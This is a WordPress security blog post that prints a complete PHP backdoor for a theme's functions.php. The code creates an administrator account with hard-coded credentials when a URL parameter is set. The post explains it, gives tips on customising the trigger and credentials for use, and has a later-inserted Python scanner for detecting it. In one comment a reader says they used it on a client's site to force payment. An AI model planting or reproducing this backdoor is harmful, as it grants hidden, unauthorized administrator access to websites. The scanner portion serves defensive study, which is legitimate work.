
WordPress Backdoor to Create Administrator Account

Last updated on April 12th, 2019 by Robert Abela. Filed under WordPress Security Tutorials & Tips

While doing a WordPress security audit and WordPress security lock down for one of our customers, I noticed he had a WordPress password backdoor installed on his WordPress installation. The WordPress backdoor is a very simple, yet powerful PHP script which can be triggered by accessing a specific URL using a normal web browser, such as Google Chrome or Firefox.

Once the WordPress backdoor is triggered, a new WordPress user with Administrator role is automatically created on the customer’s WordPress website, which a malicious user can use to regain access to someone’s WordPress installation any time he or she wants. In this post we will have a look at this WordPress backdoor’s code and explain how it works.

Note: This post is for educational and learning purposes ONLY. In fact we DO NOT recommend anyone to use such a backdoor in his or her WordPress installation.

WordPress Backdoor

The WordPress backdoor is listed in the below example. It is a simple PHP function that can be added to the WordPress theme’s functions.php file.

<?php
add_action('wp_head', 'WordPress_backdoor');

function WordPress_backdoor() {
    If ($_GET['backdoor'] == 'go') {
        require('wp-includes/registration.php');
        If (!username_exists('backdooradmin')) {
            $user_id = wp_create_user('backdooradmin', 'Pa55W0rd');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}
?>

The backdoor can be triggered by accessing the URL https://www.wpwhitesecurity.com?backdoor=go (assuming it were installed on www.wpwhitesecurity.com; this is a NON working example).

How Does the WordPress Password Backdoor Work?

Using the above example, once the WordPress backdoor is triggered a new WordPress administrator account is created with the following credentials:

User:  backdooradmin
Password: Pa55W0rd

Using the WordPress Backdoor

If you would like to use the above WordPress backdoor for whatever reason you might have, use a different URL from the one specified in the above example (by changing the GET variable name and value on line 5). Also use a strong username and password (specified on line 8).

WP White Security Tip: We DO NOT recommend you to use such a WordPress backdoor. The information in this post should only be used for educational and learning purposes.

Please note that by posting information about this WordPress backdoor online, we are not exposing anything malicious. For someone to create such a backdoor, he or she would need FTP access to your WordPress website. If someone manages to gain FTP access to your WordPress website, there are many other things you should worry about rather than this WordPress backdoor.
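As an added defensive example (not part of the original post and not WP White Security's own tooling), the following Python scanner walks a directory such as wp-content/ and flags PHP files that combine the indicators of the backdoor above: request input read from $_GET/$_POST, a call to wp_create_user, and a set_role('administrator') grant. The regular expressions, the severity scheme and the embedded sample are my own assumptions.

```python
import re
from pathlib import Path

# Indicators modelled on the backdoor shown above. Registration forms legitimately
# read $_POST and call wp_create_user, so request input + user creation is only a
# "review" hit; request input + an administrator role grant is reported as "high".
REQUEST_INPUT = re.compile(r'\$_(GET|POST|REQUEST|COOKIE)\s*\[')
USER_CREATION = re.compile(r'\b(wp_create_user|wp_insert_user)\s*\(', re.I)
ADMIN_ROLE = re.compile(r'\b(set_role|add_role)\s*\(\s*[\'"]administrator[\'"]', re.I)

def _line_of(rx, source):
    m = rx.search(source)
    return None if m is None else source.count('\n', 0, m.start()) + 1  # 1-based

def scan_php_source(source):
    """Classify one file: {'severity': 'high'|'review'|'none', 'lines': {indicator: line}}."""
    lines = {name: ln for name, rx in (('request_input', REQUEST_INPUT),
                                       ('user_creation', USER_CREATION),
                                       ('admin_role', ADMIN_ROLE))
             if (ln := _line_of(rx, source)) is not None}
    if 'request_input' in lines and 'admin_role' in lines:
        severity = 'high'
    elif 'request_input' in lines and 'user_creation' in lines:
        severity = 'review'
    else:
        severity = 'none'
    return {'severity': severity, 'lines': lines}

def scan_tree(root):
    """Scan every .php file under root (e.g. wp-content/) and return the hits."""
    hits = {}
    for php in Path(root).rglob('*.php'):
        try:
            result = scan_php_source(php.read_text(errors='replace'))
        except OSError:
            continue
        if result['severity'] != 'none':
            hits[str(php)] = result
    return hits

# Constructed sample: the functions.php backdoor from this post, as a string.
BACKDOOR_SAMPLE = """<?php
add_action('wp_head', 'WordPress_backdoor');
function WordPress_backdoor() {
    if ($_GET['backdoor'] == 'go') {
        $user = new WP_User(wp_create_user('backdooradmin', 'Pa55W0rd'));
        $user->set_role('administrator');
    }
}
"""
```

Removing the code does not remove the account it already created, so pair the scan with a review of existing administrators (for example `wp user list --role=administrator` with WP-CLI) and delete any you do not recognise.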

If you would like to make a WordPress Security Audit, pimp up the security of your WordPress installation or need any type of WordPress professional support, drop us an email on help@wpwhitesecurity.com.


6 comments

Tico 14/12/2012

Hi, the script works as you explain but I keep getting this error “You do not have sufficient permissions to access this page.” Even after I log out and then use the normal admin access, I can see the new account made along with the user role being admin but I still get the error. I am using 3.4.2. Please help.

John Bonello 14/12/2012

Hi Tico,

Thank you for following our blog. We are willing to assist you in solving your issue, but due to the sensitivity of the issue (i.e. a WordPress backdoor implementation) contact us directly via our contact form since we need to verify that you are the owner of the website you are working on.

Joni 24/09/2018

Guys, I need to erase an entire post along with its corresponding photos in my blog. But whenever I sign in and look at my dashboard, the post isn’t there. Impossible to delete something that doesn’t exist, right? But when I web search or view the blog site, the post and photos are there. What’s happening here? No, I did not use that reality stone on my blog.

Here’s my WordPress blog — jonianzures.wordpress.com and I want to completely remove the post “Janet and Niña at SM City – Marilao” and its pictures. Many thanks, amigos!

You can delete it from there or just me how to dowg it.

Robert Abela 03/10/2018

Thanks for reaching out Joni. We do not provide such services but may I recommend you to read how to clean a hacked WordPress website?

Note that the article is introductory and if you do not have experience with these things, you’d be better off paying someone professional to check the website for you.

Pat Racco 07/05/2019

It worked perfectly, thanks a lot!
I’ve been ripped off once so I believe leaving a backdoor until the client pays you in full is more than legit.
I would just suggest specifying that the above-mentioned credentials should be changed every time, otherwise anyone could run a simple script and find backdoors like the above.
Just my 2 cents.
Regards,
Pat

Robert Abela 07/05/2019

Glad it worked for you. However, I do not recommend using this as a backdoor on your client's website. Such an approach is really unethical and very risky! There are several other ways to protect your benefits / business without using such measures.
